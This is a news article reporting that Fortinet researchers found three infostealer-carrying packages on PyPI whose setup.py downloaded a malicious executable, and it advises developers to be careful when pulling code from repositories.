Programmers: look out for these infostealers on the Python Package Index

Magnifying glass enlarging the word 'malware' in computer machine code
(Image credit: Shutterstock)

Three malicious packages carrying infostealers were recently discovered, and subsequently removed, from the PyPI repository.

Researchers from Fortinet found three packages, uploaded between January 7 and 12, by a user named “Lollip0p”. These three are called “colorslib”, “httpslib”, and “libhttps”, and if you’ve used them before, make sure to remove them immediately. 

Usually, cybercriminals looking to compromise Python developer endpoints via PyPI will try typosquatting - giving their malicious packages names almost identical to others belonging to legitimate projects. That way, developers who are either reckless, or in a hurry, might unknowingly use the malicious one, instead of the clean one. 

Stealing browser data

This campaign, however, is different, as these three have unique names. To build trust, the attacker drafted complete descriptions for the packages. While the total download count for these three hardly surpassed 500, it might still prove devastating if it’s a part of a larger supply chain, the publication states.

In all three cases, the attackers are distributing a file called “setup.py” which, after running a PowerShell, tries to download the “Oxyz.exe” executable from the internet. This executable, the researchers are saying, is malicious, and steals browser information. We don’t know exactly what type of information the malware is looking to steal, but infostealers usually go for saved passwords, credit card data, cryptocurrency wallets, and other valuable information.

 The report also found that the detection rate for these executables are relatively low (up to 13.5%), meaning the attackers can successfully siphon out data even from endpoints protected by antivirus solutions. 

While the malicious packages have been removed from PyPI already, nothing is stopping the attackers from simply uploading them with a different name, and from a different account. That being said, the best way to protect against this type of supply chain attack is to be particularly careful when downloading code building blocks from repositories. 

Via: BleepingComputer

TOPICS

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

Read more
The Python banner logo on a computer screen running a code editor.
More malicious Python packages are on the loose, experts warn
An abstract image of digital security.
Hundreds of GitHub repositories hijacked to trick users into downloading malware
Hands typing on a keyboard surrounded by security icons
Infostealers on the rise: the latest concern for organizational defenses
A concept image of someone typing on a computer. A red flashing danger sign is above the keyboard and nymbers and symbols also in glowing red surround it.
North Korean Lazarus hackers launch large-scale cyberattack by cloning open source software
GitHub Webpage
A cracked malicious version of a Go package lay undetected online for years
A digital representation of a lock
Security experts are being targeted with fake malware discoveries
Latest in Software & Services
woman listening to computer
AWS vs Azure: choosing the right platform to maximize your company's investment
A person at a desktop computer working on spreadsheet tables.
Trello vs Jira: which project management solution is best for you?
Autonomous finance
Quickbooks vs Quicken: what are the main strengths and weaknesses for your business
finance
Quickbooks vs Xero: which is the best for your business?
Group of people meeting
Zoom vs Google Meet: which is the best video conferencing tool for your business?
Fingers typing on a computer keyboard.
Microsoft 365 Personal vs Microsoft 365 Family: are there any real differences?
Latest in News
A man holds a smartphone iPhone screen showing various social media apps including YouTube, TikTok, Facebook, Threads, Instagram and X
A worrying Apple Password App vulnerability reportedlyleft users exposed for months
Google Pixel 9a
Google is delaying the Pixel 9a to fix a mystery “component quality issue”
The bottom left corner of an Android phone, showing the Phone, Messages, Google icons and Google Search bar
Google Messages remote delete will soon save you from texting embarrassment – and here's how it works
ExpressVPN mobile app and Aircove
ExpressVPN ‘reduces workforce’ for the second time in two years
The Nanoleaf PC Screen Mirror Lightstrip being used on a desktop computer.
Mac gaming could get an intriguing boost – but not in the way you'd expect
Snapdragon G Series
Qualcomm poised to muscle in on AMD's territory with powerful gaming handheld processors